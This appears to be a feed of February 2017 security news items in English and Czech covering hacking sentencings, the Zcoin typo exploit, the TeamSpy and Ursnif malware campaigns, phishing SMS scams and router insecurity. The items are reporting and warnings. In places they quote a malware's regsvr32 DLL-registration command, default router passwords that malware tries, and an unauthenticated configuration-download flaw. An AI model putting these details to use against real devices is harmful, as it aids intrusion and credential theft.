A man has been sentenced to 34 months in prison and three years of supervised release for hacking into the systems of pulp and paper company Georgia-Pacific, the Department of Justice announced on Friday.
Based in Atlanta, Georgia-Pacific is one of the world’s largest manufacturers and distributors of paper products. The company has more than 200 facilities worldwide and it employs roughly 35,000 people.
Brian P. Johnson, age 44, had worked at the company’s paper mill in Port Hudson, Louisiana, as an IT specialist and system administrator until February 14, 2014, when he was terminated and escorted from the facility.
Johnson then remotely accessed the facility’s computers and caused system failures over the course of several days. When the FBI searched the man’s home in late February 2014, agents noticed a VPN connection to Georgia-Pacific’s systems on his computer.
The damage caused by the disgruntled employee has been estimated at more than $1.1 million, which Johnson will have to pay in restitution to Georgia-Pacific. He has also been ordered to pay $100 to the government and forfeit the devices used to commit the crime.
The former sysadmin was indicted in June 2015 and he pleaded guilty to intentionally damaging a protected computer in February 2016. He will begin serving his prison term next month.
Last year, the U.S. Attorney’s Office for the Middle District of Louisiana launched a new cybersecurity initiative which handles such threats, including attacks on critical infrastructure. The initiative is a result of partnerships with several federal, state and local law enforcement agencies.
Bug Allowed Theft of Over $400,000 in Zcoins
20.2.2017 securityweek Vulnerebility
An implementation bug has allowed someone to make a profit of more than $400,000 after creating roughly 370,000 units of the Zcoin cryptocurrency, users were told on Friday.
Zcoin (XZC), worth approximately $2 per unit, is an implementation of the Zerocoin protocol, which aims to provide fully anonymous currency transactions. Zerocoin has also been used to create a new protocol called Zerocash and the ZCash digital currency.
A typo in the code allowed an attacker to fraudulently obtain Zcoins. They managed to create roughly 370,000 coins and sold a majority of it for a profit of approximately 410 bitcoins ($435,000).Zcoin
Zcoin representatives pointed out that the exploit was possible due to a bug in the code and not a cryptographic weakness, and that the anonymity provided by Zerocoin has not been compromised. Zcoin said the damage was “mostly absorbed by the markets.”
“From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks,” said Zcoin’s Reuben Yap.
Ian Miers, one of the founders of ZCash, has provided a likely explanation for what went wrong. Miers believes it was probably a bug that resulted from copying and pasting code.
The bug was addressed over the weekend and pools and exchanges have been instructed to update their code. Zcoin said no coins will be forfeited or blacklisted, despite the severity of the hack.
Incidents involving cryptocurrencies are not uncommon. In June 2016, the value of the Ethereum digital currency plummeted after someone exploited a vulnerability in the DAO.
TeamSpy malware is back, it transforms TeamViewer into a spying software
20.2.2017 securityaffairs Virus
Security experts from Heimdal Security discovered a new spam campaign over the weekend leveraging the TeamSpy malware to spy in victims.
Security experts from Heimdal Security have uncovered a new spam campaign emerged over the weekend. The crooks used the notorious TeamSpy malware to gain full access to the target computers.
It’s a long time we have no news about the TeamSpy malware, it made the headlines in 2013 when security researchers at Hungary-based CrySyS Lab discovered a decade-long cyber espionage campaign that targeted high-level political and industrial entities in Eastern Europe.
The attackers, dubbed by security researchers TeamSpy, used the popular remote-access program TeamViewer and a specially crafted malware to steal secret documents and encryption keys from victims.
Back to the present, the last wave of attacks exploited social engineering attacks to trick victims into installing the TeamSpy malware.
Malware authors used DLL hijacking to execute unauthorized actions through legitimate software.
The attach chain starts with spam email using the .zip file attachments such as:
Fax_02755665224.zip -> Fax_02755665224.EXE
When the victim opens the zip archive it executes the accompanying .exe file which drops the TeamSpy malware onto the victim’s computer, as a malicious DLL:
[% APPDATA%] \ SysplanNT \ MSIMG32.dll. That library then recorded via C: \ Windows \ system32 \ regsvr32. exe “/ s” [% APPDATA%] \ SysplanNT \ MSIMG32.dll
According to the researchers, the TeamSpy malware includes various components in the otherwise legitimate TeamViewer application, two of them are keylogger and a TeamViewer VPN.
The attacks discovered by Heimdal security are very insidious for victims that will be not able to detect them.
“Given how the TeamSpy infection happens, it is clear that a TeamViewer session started by the attackers will be invisible to the victim. This can lead to numerous forms of abuse against the services that the logged in user runs on his/her computer.” states the analysis shared by Heimdal Security.
“This attack can also circumvent two-factor authentication and can also give cybercriminals access to encrypted content which is unencrypted by the users on their compromised computers.”
At the time I was writing the majority of Antivirus software is not able to detect this variant of the TeamSpy malware, it has a detection rate of 15/58 on VirusTotal.
As usual, let me suggest to avoid opening unwanted emails that you receive and that you don’t open email attachments from unknown senders.
“We highly recommend that you carefully analyze unwanted emails that you receive and that you don’t download email attachments from unknown senders. Malware can disguise itself in many forms on the web, and all it takes is one click to trigger an infection.” concluded the analysis.
Láska za 19 000 korun. Policisté varují před podvody na seznamkách
20.2.2017 Novinky/Bezpečnost Hacking
Na pozoru by se měli mít lidé hledající lásku na internetu. Ukazuje to nedávný případ, kdy žena poslala do USA 750 amerických dolarů (zhruba 19 000 Kč) muži, který o sobě tvrdil, že je vdovec. Peníze mu měly zajistit přepravu zavazadel z jeho vojenské mise. Když ale žena finanční prostředky poslala, přestal komunikovat.
Podle policistů nejde o ojedinělé případy. Lidé by měli být při komunikaci na internetu obezřetní, uvedla policejní mluvčí Marie Šafářová. Například v Olomouckém kraji již dříve vzniklo speciální oddělení pro boj s internetovou kriminalitou.
Poslední případ vyšetřují kriminalisté od minulého týdne, muž od své oběti vylákal platbu na zahraniční bankovní účet. „Vydával se za vdovce z Ameriky, architekta, který má devítiletou dceru. Také ženě sdělil, že momentálně působí jako voják v Afghánistánu a mise právě končí. Domluvili se na schůzce v České republice s tím, že nejprve pošle svá zavazadla," uvedla mluvčí.
Podle kriminalistů mohou být stejným nebo obdobným způsobem kontaktovány další ženy na seznamovacích portálech. Policisté proto lidi nabádají, aby nejen na sociálních sítích, ale i jinde v prostředí internetu byli zvlášť opatrní a ostražití. Poukazují přitom na to, že anonymita internetu umožňuje pachatelům jednoduše vyhledávat potenciální oběti.
Na internetu číhají další hrozby
Je nicméně důležité upozornit na to, že na internetu nečíhají pouze podvodníci lákající finanční hotovost. Nástrah je zde daleko více a je nutné podotknout, že některé jsou daleko vážnější, jak ukazuje trilogie filmů Seznam se bezpečně!, za kterými stojí společnost Seznam.cz.
První dva díly byly postaveny na reálných příbězích. V jednom z nich se například představil 14letý David, který se spřátelil na internetu s neznámým dospělým mužem. Ten mu nabízel dvoutisícovou úplatu za to, že mu pošle fotky a video s obnaženým tělem. Zachycen je i rozhovor s pedofilem Miroslavem či 16letým Patrikem, který se živil jako dětský prostitut.
Třetí díl pojednává o kauze skautských vedoucích z Ústí nad Labem, kteří vydírali intimními snímky děti na internetu a na čtyři desítky z nich pohlavně zneužili.
Jednou z ústředních postav filmu je odsouzený skautský vedoucí Martin Mertl, který před kamerou popsal, jak útoky probíhaly. Exkluzivně Novinkám již sám dříve popsal, že v celé kauze byl hlavním pachatelem.
Celou trilogii Seznam se bezpečně! můžete sledovat na stránkách www.seznamsebezpecne.cz.
Podle policejních statistik počet trestných činů páchaných prostřednictvím internetu klesl, loni to bylo 286 případů, o rok dříve 405. Pro vedení policie je i nadále potírání kyberkriminality jednou z priorit v letošním roce, uvedl na konci ledna náměstek krajského policejního ředitele Radovan Vojta.
Ukrainian Cybercriminal who sent Brian Krebs heroin sentenced to prison in US
20.2.2017 securityaffairs Crime
The Ukrainian Cybercriminal who tried to get revenge on Brian Krebs for exposing him was sentenced to 41 months in prison in the US.
The Ukrainian cybercriminal Sergey Vovnenko (31, aka “Sergey Vovnencko,” “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,” “Stranier” and “Darklife.”) who attempted to get revenge on the notorious cyber security investigator Brian Krebs for exposing him has been sentenced to Prison in US.
The man was arrested in Italy in June 2014, where he remained 15 months before being extradited to the United States in January 2016.
The US court to sentenced Vovnenko to 41 months in jail and three years of supervised release, the authorities also ordered to pay more than $83,000 in restitution.
Vovnenko was the administrator on two cybercrime forums, he admitted stealing login credentials and payment card data as part of an international hacking conspiracy, and pleaded guilty to wire fraud conspiracy and aggravated identity theft.
“From September 2010 through August 2012, Vovnenko and his conspirators operated an international criminal organization that hacked into the computers of individual users and companies located in the United States and elsewhere.” reads the DoJ. “They used that access to steal user names and passwords for bank accounts and other online services, as well as debit and credit card numbers and related personal identifying information.”
Alongside his accomplices, he infected more than 13,000 computers with the Zeus banking Trojan to steal banking data.
Why Brian Krebs?
Krebs started investigating Vovnenko in 2013, the popular expert was able to discover the real identity of the criminal, that to get revenge on him requested donations from other criminals to purchase heroin from Silk Road and sent it to Krebs to get him arrested for drug possession.
Unfortunately for the Ukrainian cybercriminal Vovnenko , Brian Krebs who had infiltrated his criminal forum was able to alert the law enforcement before the drugs were shipped to his address.
“Fly’s plan was simple: Have the drugs delivered to my home in my name, and then spoof a call from one of my neighbors to the local police informing them that I was a druggie, that I had druggie friends coming in and out of my house all day long, and that I was even having drugs delivered to my home.” wrote Krebs.
“The forum members took care to find the most reputable sellers of heroin on the Silk Road. After purchasing a gram of the stuff from the Silk Road’s top smack seller — a drug dealer who used the nickname “Maestro” — Fly posted the USPS tracking link for the package into the discussion thread on his forum.”
Krebs looks forward to meeting the Ukrainian cybercrime in person on day as explained in his post.
“Cybercrooks have done some pretty crazy stuff to me in response to my reporting about them. But I don’t normally get this kind of closure. I look forward to meeting with Fly in person one day soon now that he will be just a short train ride away. And he may be here for some time: If convicted on all charges, Fly faces up to 30 years in U.S. federal prison.” concludes Krebs.
If you are interested in the story, the Justice Department’s press release on Vovnenko’s indictment is here and the actual indictment can be found at this link.
Ukrainian Cybercriminal Sentenced to Prison in U.S.
20.2.2017 securityweek Crime
Hacker Who Tried to Get Revenge on Brian Krebs for Exposing Him Sentenced to Prison
The Ukrainian cybercriminal who attempted to get revenge on security blogger Brian Krebs for exposing him has been sentenced by a U.S. court to 41 months in prison and three years of supervised release, and ordered to pay more than $83,000 in restitution.
Sergey Vovnenko, aged 31, was also known as “Sergey Vovnencko,” “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,” “Stranier” and “Darklife.” He was arrested in Italy in June 2014, where he spent the next 15 months trying to fight his extradition to the United States.
In January 2016, after being extradited to the U.S., Vovnenko admitted stealing login credentials and payment card data as part of an international hacking conspiracy, and pleaded guilty to wire fraud conspiracy and aggravated identity theft.
According to authorities, Vovnenko was an administrator on two cybercrime forums. Between September 2010 and August 2012, he and his co-conspirators infected at least 13,000 computers with the Zeus banking Trojan in order to steal valuable information.
Investigative journalist Brian Krebs started monitoring Vovnenko in 2013, and he soon managed to find his real identity. In an effort to get revenge on Krebs, the Ukrainian had requested donations from other fraudsters to purchase heroin from Silk Road and have it delivered to the blogger.
The plan was to spoof a call from one of Krebs’ neighbors to local police and get him arrested for drug possession. However, the journalist had infiltrated Vovnenko’s forum and alerted the police before the drugs arrived.
Krebs believes the hacker’s “antics” likely contributed to his arrest and guilty plea. The blogger said Vovnenko apparently turned his life around while in prison in Italy.
Vovnenko is not the only hacker who targeted Krebs and was sentenced last week. Eric Taylor, known online as UG Nazi member “Cosmo the God,” has been sentenced to three years probation for running Exposed.su, a website that leaked private information on several high-profile individuals.
Krebs was swatted by Taylor and others following his coverage of Exposed.su. Another member of the conspiracy, Mir Islam, was sentenced in June 2016 to two years in prison.
Here you are the distribution network behind the Ursnif banking Trojan
20.2.2017 securityaffairs Virus
The security experts at Palo Alto Networks published a detailed analysis of the architecture used to spread the Ursnif banking Trojan worldwide.
Malware researchers from Palo Alto Networks are monitoring the diffusion of the Ursnif banking Trojan worldwide and have identified the architecture used to spread it.
The Ursnif Trojan is spread via spam emails that contain malicious attachments that are used to download and execute the malware. In this attack scenario, the researchers have focused their investigation on the spam botnet used to send the malicious emails and the network compromised web servers used to host the malicious code.
Below the key findings of the distribution infrastructure.
The spam botnet focuses on delivering Banking Trojans or Downloader Trojans to Japan, Italy, Spain, Poland, Australia, and Germany.
Compromised web servers host Banking Trojans and spam bot files that are download by malicious downloader program distributed by spam.
The experts discovered that crooks copied their malicious files on multiple servers making their infrastructure redundant, more than 200 such files were discovered on 74 different servers used between April 2015 and January 2017. Most were compromised personal or small-to-medium-sized business websites in Europe, which haven’t been maintained for years.
The researcher discovered that in 2016, the attackers mostly targeted the Japanese users with the Shiotob (a.k.a Bebloh or URLZone) malware. The researchers detected 75 unique variants in 7 million spam emails. The malware was used to steal banking credentials and to download a secondary payload, including the Ursnif banking trojan.
“Using our threat intelligence platform AutoFocus, Palo Alto Networks observed millions of e-mails sent to Japanese targets throughout 2016. Most of the emails were written in Japanese (see example in Figure 1). The latest attachment we’ve seen, detected in January 2017, is a JavaScript downloader that simply downloads Ursnif from a remote site and executes it on compromised machine.” reads the analysis published by the PaloAlto Networks.
An analysis of 200 unique Japanese IP addresses that were spamming Shiotob revealed 250 unique malware samples being sent among 268,000 emails.
In is interesting to note that threat actors behind the spam campaigns were also able to tailor their attacks depending on the specific country.
The Ursnif banking trojan and Shiotob were delivered in Australia, KINS and Ursnif in Italy; Shiotob and Ursnif in Japan, Ursnif and Tinba in Spain and Poland, and Ursnif and KINS in Germany.
[The following graph is] “the breakdown of malware found on the web servers and where the malware downloaded from based on our telemetry (Table 2). The results correspond to the analysis of targets and malware by SPAM in the previous section.”
The unique element still not clear is related to threat actor behind the campaign, is is a single group or several gangs sharing the same infrastructure?
Kdo napadl servery OBSE? Útočník stále uniká
20.2.2017 Novinky/Bezpečnost BigBrother
Organizace pro bezpečnost a spolupráci v Evropě (OBSE) nedokáže identifikovat strůjce loňských hackerských útoků proti serverům instituce. Na okraj mezinárodní bezpečnostní konference v Mnichově to řekl generální tajemník OBSE Lamberto Zannier. Šéf německé kontrarozvědky Hans-Georg Maassen přitom v lednu prohlásil, že za hackerským útokem podle všeho stálo Rusko.
„Viděli jsme stopy po útoku. Víme, že do systému, e-mailového systému, někdo pronikl. Z toho, co jsme zjistili, nedokážeme vystopovat, odkud útok vycházel,” řekl Zannier agentuře TASS. „Zavádíme lepší ochranu, ale z toho, co víme, nemůžeme ukázat prstem žádným směrem,” dodal.
O útoku hackerů proti OBSE byla veřejnost informována koncem prosince. Podle dřívějších informací agentury DPA ho odhalil právě německý Spolkový úřad na ochranu ústavy, který plní funkci civilní kontrarozvědky. Jednou z nejdůležitějších akcí OBSE je nyní mise na východě Ukrajiny, kde trvá již třetím rokem ozbrojený konflikt mezi ukrajinskými vládními silami a proruskými separatisty.
Z hackerských útoků obvinila Rusko také administrativa bývalého amerického prezidenta Baracka Obamy. Počítačoví piráti podle ní na rozkaz Kremlu pronikli do elektronické pošty Demokratické strany, aby ovlivnili prezidentské volby. Moskva všechna nařčení odmítla.
A group of Iraqi hackers called Pro_Mast3r defaced a Trump website
20.2.2017 securitaaffairs Hacking
The group of Iraqi hackers called “Pro_Mast3r” has breached the server hosting a Trump website associated with campaign donations.
A group of hackers who is calling themselves “Pro_Mast3r” has defaced a website associated with President Donald Trump’s presidential campaign fundraising on Sunday.
The website was hosted on the server secure2.donaldjtrump.com that is managed by the Cloudflare content management and security platform.
The website is not directly linked from the Trump Pence campaign’s home page. According to the Ars website, the hacked machine is an actual Trump campaign server that uses a legitimate certificate.
“But it does appear to be an actual Trump campaign server—its certificate is legitimate, but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure.” states Ars.
The defaced page displayed an image of a man in a fedora and the following text:
The analysis of the source code of the page revealed the presence of a link to a javascript on a now-nonexistent Google Code account, ‘masterendi’. This account was associated with the hack of other websites.
The script is a snow animation script, it doesn’t include any malicious component.
The strange circumstance in this hack is that attackers included JavaScript that was no more available in the wild.
Archive.org includes several instances of the link at this specific Javascript, but they are no more active since 2015.
At the time I was writing the server is down.
Let’s wait for a reply from both Cloudflare and the Trump-Pence campaign team.
Podvodné SMS nepřestávají strašit. Příjemce připraví o peníze
19.2.2017 Novinky/Bezpečnost Mobilní
Českem stále kolují podvodné SMS zprávy, ve kterých se počítačoví piráti vydávají za zaměstnance přepravní společnosti DHL. Uživatelé by se před nimi měli mít velmi na pozoru, protože jejich prostřednictvím se do chytrého telefonu může dostat škodlivý virus. A ten pak příjemce nebezpečné SMS zprávy připraví zpravidla o peníze.
Podvodné SMS zprávy se začaly Českem šířit už minulý týden, jak již Novinky.cz informovaly.
Bezpečnostní experti nicméně před nimi varovali znovu, protože počítačoví piráti v jejich rozesílání nepolevují. Spíše právě naopak.
Texty podvodných zpráv kybernetičtí útočníci neustále obměňují, jejich význam je však zpravidla vždy stejný. Příjemce se snaží zastrašit. „Vážený kliente DHL, vaše zásilka nemůže být doručena z důvodu nečitelné adresy. Pro změnu adresy použijte naši aplikaci DHL Express Online,“ stojí ve zprávě.
Přímo v SMS přitom příjemci naleznou i odkaz na stažení zmiňované aplikace. A právě v tom je hlavní kámen úrazu. Pokud aplikaci stáhnou, nainstalují si také trojského koně, který později při otevření internetového bankovnictví podsune falešnou přihlašovací stránku. Uživatelé tak naservírují počítačovým pirátům přístup k účtu jako na zlatém podnosu.
Mohou sjednat půjčku
A vzhledem k tomu, že pachatelé již mají přístup i k mobilnímu telefonu, kam zpravidla chodí potvrzovací SMS zprávy k proběhlým transakcím, už jim nic nebrání ve vybílení účtu.
Sluší se také připomenout, že kyberzločinci mohou snadno připravit uživatele i o peníze, které ve skutečnosti na účtu ani nemají. Každá druhá banka totiž v dnešní době nabízí sjednání půjčky on-line. I tak se mohou útočníci dostat k finanční hotovosti.
Jsme v intenzivním kontaktu s mobilními operátory, aby takové SMS filtrovali.
zástupci společnosti DHL
Společnost DHL se již od podvodných SMS zpráv distancovala dříve. „Aktuálně se nám podařilo zneplatnit odkazy na inkriminované webové stránky, které organizátoři zřídili v Panamě. Nadále jsme v intenzivním kontaktu s mobilními operátory, aby takové SMS filtrovali a pokusili se zjistit zdroj odesílaných SMS,“ uvedli zástupci společnosti.
Je nicméně velmi pravděpodobné, že podvodníci – podobně jako při dalších útocích – zřídí jiné webové stránky, jež budou opět představovat pro uživatele riziko. „Za žádných okolností neotevírejte stránky, na které se SMS odkazuje!“ stojí v prohlášení podniku.
Aktuální hrozba se týká výhradně přístrojů s operačním systémem Android. Není nicméně vyloučeno, že stejným způsobem se budou kyberzločinci snažit dostat i do přístrojů postavených na jiných platformách.
Na smartphony útočí pravidelně
Na chytré telefony se zaměřují počítačoví piráti v posledních měsících stále častěji. Uživatelé na těchto přístrojích totiž velmi často podceňují bezpečnost.
Aby majitel omezil rizika, měl by svůj smartphone vybavit podobně jako stolní počítač antivirovým programem a měl by pravidelně stahovat všechny důležité aktualizace nainstalovaných aplikací i samotného operačního systému.
The Russian propaganda is scaring European Intelligence and NATO
19.2.2017 securityaffairs Cyber
Top NATO General Petr Pavel confirmed that Russian propaganda was behind a false report of a rape by German soldiers in Lithuania.
Psychological Operations are not a novelty in the military and Russia demonstrated a great ability in the adoption of such techniques.
Top NATO General Petr Pavel confirmed that Russia was behind a false report of a rape by German soldiers in Lithuania, the operation aimed to undermine support for NATO’s new eastern force., a senior NATO general said on Saturday, warning Europe to expect more such “fake news”.
The senior NATO general is warning Europe to expect more operation aimed to spread “fake news”.
According to Pavel, an email making the claim that German-speaking men raped a 15-year-old girl last week in a Lithuanian was sent to the speaker of Lithuanian’s parliament.
“It is clearly fake news and I believe we should expect more of this,” Pavel, told Reuters.
Chairman of the Military Committee, General Petr Pavel during the joint press point with Supreme Allied Commander Europe, General Philip M. Breedlove and Supreme Allied Commander Transformation, General Denis Mercier following the 174th Military Committee in Chiefs of Defence Session
Moscow doesn’t accept the presence of the NATO troops closer to its border, for this reason, its military started a propaganda to influence the sentiment of the local population against the soldiers of the Alliance.
The Russian propaganda machine is considered very effective and almost every government fears its activities.
The Estonia’s Foreign Minister Sven Mikser also said he expected more “hostile propaganda” over the troop presence.
“It will likely use legal means, such as propaganda and they will try to influence public opinion against the deployments,” he said. “It will get stronger … but we will be transparent, consistent.”
European intelligence agencies believe that Russia will launch cyber attacks against foreign countries in order to destabilize their governments.
In January, Defense Minister Le Drian comments expressed concerns about cyber attacks against defense systems and warned of hacking campaigns on the upcoming elections.
In February, the Dutch Government announced that all ballots in the election next month will be counted by hand in order to avoid any interference due to cyber attacks.
“Reports in recent days about vulnerabilities in our systems raise the question of whether the results could be manipulated,” explained Interior Minister Ronald Plasterk in a statement on Wednesday. “No shadow of doubt can be permitted.”
The Minister fears cyber attacks from foreign states, including Russia that is one of the most dreaded threats.
“Now there are indications that Russians could be interested, for the following elections we must fall back on good old pen and paper,” he added.
The German Government also fears possible interference of the Russian hackers, for this reason the Chancellor would start an intense dialogue with Moscow.
“German Chancellor Angela Merkel said on Saturday she would like to discuss the issue with Russia, but it was questionable whether the problem could be successfully addressed before European elections this year.” reported the Reuters.
Back to the present, Pavel confirmed that NATO’s top commanders and their Russian counterparts could restart in the next few weeks, he doesn’t exclude a face-to-face meeting.
New York state cyber security rules will be effective on March 1st
19.2.2017 securityaffairs Cyber
The New York state announced that a set of cyber security regulations that will take effect on March 1st to tackle cyber threats.
On Thursday, the New York state announced that a cyber security regulation will take effect on March 1st. The regulations will require financial institutions and insurers to meet minimum cyber security standards and report cyber incidents to regulators.
The organizations subject to the new cyber security rules include both state-chartered banks and foreign banks operating in the New York state, along with any insurer that works in the state.
The measures are necessary to mitigate the risk of exposure to cyber crime organization and other threat actors.
The cyber security regulation announced by the New York state lay out unprecedented requirements on cyber security posture organizations must take to protect their infrastructure from cyber attacks.
The regulations are the result of huge work that started in 2014, the New York State delayed implementation of the cyber security regulation by two months and loosened some requirements after financial organizations demanded an extension due to the overhead to deal with ensuring the compliance.
“The rules, in the works since 2014, followed a series of high-profile data breaches that resulted in losses of hundreds of millions of dollars to U.S. companies, including Target Corp, Home Depot Inc, and Anthem Inc.” reported the Reuters.
The importance of the regulations was highlighted by the Governor Andrew Cuomo in the statement:
“These strong, first-in-the-nation protections will help ensure this industry has the necessary safeguards in place” to protect businesses and clients “from the serious economic harm caused by these devastating cyber-crimes,”
Cuomo New York state cyber security rules
Financial institutions and insurers will have to scrutinize security posture of third-party service providers and conduct a continual risk assessment process.
“The revised rule requires firms to perform risk assessments in order to design a program particular to them, and gives them at least a year-and-a-half to comply with the requirements. The final rule took into account the burden on smaller companies, a spokeswoman for the agency said.” continues the Reuters.
The good news is that the attention to cyber security is widespread in the US, a task force of U.S. state insurance regulators is already working on the development of a model cyber security law that could be transposed and by various states.
RSA Conference 2017 attendees hacked with rogue access points
19.2.2017 securityaffairs Congress
Experts at Pwnie Express discovered multiple rogue access points on the show floor that were used to hack the RSA conference attendees.
The news is very curious, the attendees at the 2017 RSA conference, one of the world’s largest security events, may have been hacked.
Security researchers at reports at Pwnie Express were scanning the conference floor when discovered a rogue access point (EvilAP attack) that were posing as known and trusted networks.
“Security testing vendor Pwnie Express has been passively scanning the airwaves on the RSA Conference show floor and has found multiple instances of EvilAP attacks.” reads a blog post published by EsecurityPlanet.com.”In an EvilAP attack, a rogue access point uses a Karma attack to trick users into thinking they are connecting to a known access point. Among the access point beacons sent out in the EvilAP attacks at the RSA Conference are common locations like Starbucks and McDonald’s.”
The pen testers at Pwnie Express confirmed that multiple users connected to a rogue access point and at least two remained connected over the course of more than a day.
According to Pwnie Express, there were multiple Wi-Fi access points running on the RSA Conference show floor that used WEP encryption … and as you know it is quite simple to hack WEP networks.
The experts at Pwnie Express highlights the risks of connecting a rogue access point, an attacker can set up it to gain “full control of all information going into and out of the device.”
A rogue access point could also be used to deliver malicious code on the user device and launch man-in-the-middle (MITM) attacks.
Nezabezpečený router jako zbraň kyberzločinců
19.2.2017 SecurityWorld Zabezpečení
Co všechno hrozí uživatelům nedostatečně zabezpečeného routeru a jak se účinně bránit proti jeho zneužití?
Routery přitahují pozornost kyberútočníků od nepaměti. Pro mnoho lidí jsou základním přístupovým bodem k internetu, ale zároveň jen zlomek uživatelů řeší jejich řádné zabezpečení.
Směrovač, který se z pohledu narušitele nachází v ideální pozici mezi koncovými zařízeními a internetovou sítí, umožní napadnout všechna napojená zařízení v jeho dosahu. Útok tak může mít mnohem ničivější následky než u samotných počítačů, jejichž zabezpečení lidé nepodceňují a každý uživatel má alespoň minimální povědomí o rizicích malwaru i možnostech, jak se proti nim bránit.
Na routery se zapomíná
Když v roce 2014 dělala společnost Tripwire průzkum mezi IT a bezpečnostními experty ve Spojených státech a Velké Británii, dospěla k alarmujícím výsledkům: z téměř dvou tisíc respondentů 30 procent IT profesionálů a 46 procent zaměstnanců po instalaci a zapojení routeru nezměnilo jeho výchozí heslo.
Víc než polovina dotazovaných v průběhu užívání pravidelně neaktualizovala firmware routeru, takže zařízení nemohlo být chráněné případnými bezpečnostními záplatami. Polovina respondentů používala pro zabezpečení Wi-Fi sítí dnes již nedoporučovaný standard WPS, který usnadňuje útočníkům jejich snahu odhalit heslo směrovače bez ohledu na jeho složitost nebo délku.
Naprostá většina dotazovaných využívala jednoduché SOHO routery. Z výzkumu vyplynulo, že až 80 procent těchto routerů obsahuje bezpečnostní chyby a jsou lehce zneužitelné, například pro masivní DDoS útoky.
Známý je případ hackerské skupiny Lizard Squad, která na Vánoce 2014 vyřadila za pomoci desítek tisíc prolomených routerů z provozu stránky Xbox Live a PlayStation Network, a znemožnila tak mnoha lidem vyzkoušet si hry, které dostali pod stromeček.
Skupina Lizard Squad se přitom vyloženě specializuje na odhalování nezajištěných routerů s hesly z továrního nastavení a vytváří z nich síť robotů, kterou zneužívá k takovýmto masivním DDoS útokům.
Útoky jsou natolik sofistikované, že využívají i speciální malware, který hledá další routery v okolí a zkouší, zda používají výchozí nastavené heslo z továrního nastavení nebo hesla typu „admin / admin“ či „root / 12345“.
Infikovaný router tedy rozšiřuje nákazu dál a přispívá k nárůstu počtu zařízení zapojených do útočné sítě DDoS. Mezi takové druhy malwaru patří například Linux/Remaiten, před jehož novou verzí nedávno varoval Eset. Útočí na routery, gatewaye a bezdrátové přístupové body. Kombinuje funkcionality již známých škodlivých kódů Tsunami (Kaiten) a Gafgyt.
Chyba ve firmwaru...
Malware Remaiten dělá kontrolu náhodných IP adres na dostupnost služby Telnet, resp. zkouší, zda se mu povede k této službě přihlásit s některým z výchozích hesel používaných výrobci routerů.
Pokud uspěje, zkusí zjistit platformu zařízení (typicky MIPS nebo ARM) a podle ní nahraje na zařízení komponentu tzv. downloaderu, jehož úkolem je spustit opět platformově odpovídajícího botnet klienta z C&C serveru. Po jeho spuštění má operátor C&C serveru zařízení pod plnou kontrolou.
„Hlavní způsob, jak této hrozbě předejít, představuje upgrade firmwaru routeru na aktuální verzi, nepoužívat mnohdy triviální přednastavené přihlašovací jméno a heslo a rovněž je vhodné zvážit, zda je opravdu nutné mít povolené přihlašování k administračnímu rozhraní routeru z internetu,“ popisuje Miroslav Dvořák, technický ředitel Esetu.
Chyby ve firmwaru routerů jsou přitom poměrně běžné. Například v roce 2014 odhalil český národní bezpečnostní tým CSIRT.CZ chybu u pěti tisíc routerů, které obsahovaly zranitelnost „rom-0“.
Router díky ní umožňoval vyexportovat a stáhnout svoji konfiguraci v podobě binárního souboru. Součástí konfigurace byla i přístupová hesla k webovému administračnímu rozhraní.
Chyba spočívala v tom, že tento soubor bylo možné stáhnout, aniž předtím bylo vyžadováno zadání hesla. Stačilo pouze znát URL tohoto souboru. Při výchozím nastavení routeru bylo možné konfiguraci stáhnout dokonce i přes WAN rozhraní, tedy z celého internetu.
Pokud se útočník dostane k administračnímu rozhraní takového routeru, může snadno přesměrovat adresy. Místo zadaného webu se tak uživateli zobrazí informační panel s upozorněním, že si musí instalovat Flash Player. Místo něj si ale do počítače stáhne škodlivý malware.
Řešením je v tomto případě úplný zákaz přístupu na webovou administraci routeru z WAN rozhraní a povolení administrace jen z jedné konkrétní vnitřní IP adresy. Nelze totiž spoléhat pouze na to, že napadený počítač vyčistí antivir, zdroj dalších hrozeb by se mohl nadále skrývat v nezajištěném routeru, k němuž dosud nemá většina bezpečnostních aplikací žádný přístup.
Chování škodlivého kódu, který napadl router, se navíc může průběžně měnit. Útočníci mohou přesměrovávat vyhledávané internetové stránky na podvodné weby a pomocí takovýchto phishingových útoků získat přístup k on-line účtům uživatelů. Velký problém to může být zejména ve firmách.
A Typo in Zerocoin's Source Code helped Hackers Steal ZCoins worth $585,000
19.2.2017 Securityweek Hacking
Are you a programmer?
If yes, then you would know the actual pain of... "forgetting a semicolon," the hide and seek champion since 1958.
Typos annoy everyone. Remember how a hacker's typo stopped the biggest bank heist in the history, saved $1 billion of Bangladesh bank from getting stolen.
But this time a typo in the Zerocoin source code costs the company more than $585,000 in losses.
Zerocoin cryptocurrency protocol is designed to add true cryptographic anonymity to Zcoin transactions that take full advantage of "Zero-Knowledge proofs" to ensure the complete financial privacy of users.
Zcoin announced Friday that "a typographical error on a single additional character" in the Zerocoin source code helped an attacker to steal 370,000 Zerocoin, which is over $585,000 at today's price.
"We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC," the Zcoin team said.
The team said the bug was created due to one extra character left inside Zerocoin source code that allowed the unknown attacker to reuse his/her existing valid proofs to generate additional Zerocoin spend transactions.
In short, by initiating one transaction, the attacker received Zcoins multiple times over.
The Zerocoin team explicitly mentioned that the bug wasn't due to any weakness in its cryptographic protocol, and anonymity of Zcoin or its users has not been compromised.
"We knew we were being attacked when we saw that the total mint transactions did not match up with the total spend transactions," the team said. "If our total supply were not verifiable due to hidden amount transactions, we would not have been able to discover this bug."
According to the Zerocoin team, the attacker or group of attackers were very sophisticated in hiding their tracks through the generation of lots of exchange accounts and carefully by spreading out deposits and withdrawals over several weeks.
The team is set to release an urgent fix within the next 24 hours. So, all pools and exchanges are advised to update their software as soon as the release is out.
An implementation bug in Zerocoin helped hackers steal ZCoins worth $585,000
19.2.2017 Securityaffairs Hacking
A hacker exploited an implementation bug in the source code of the Zerocoin currency scheme to steal ZCoins worth $585,000.
“Zerocoin is a project to fix a major weakness in Bitcoin: the lack of privacy guarantees we take for granted in using credit cards and cash.” reads the description on the project.
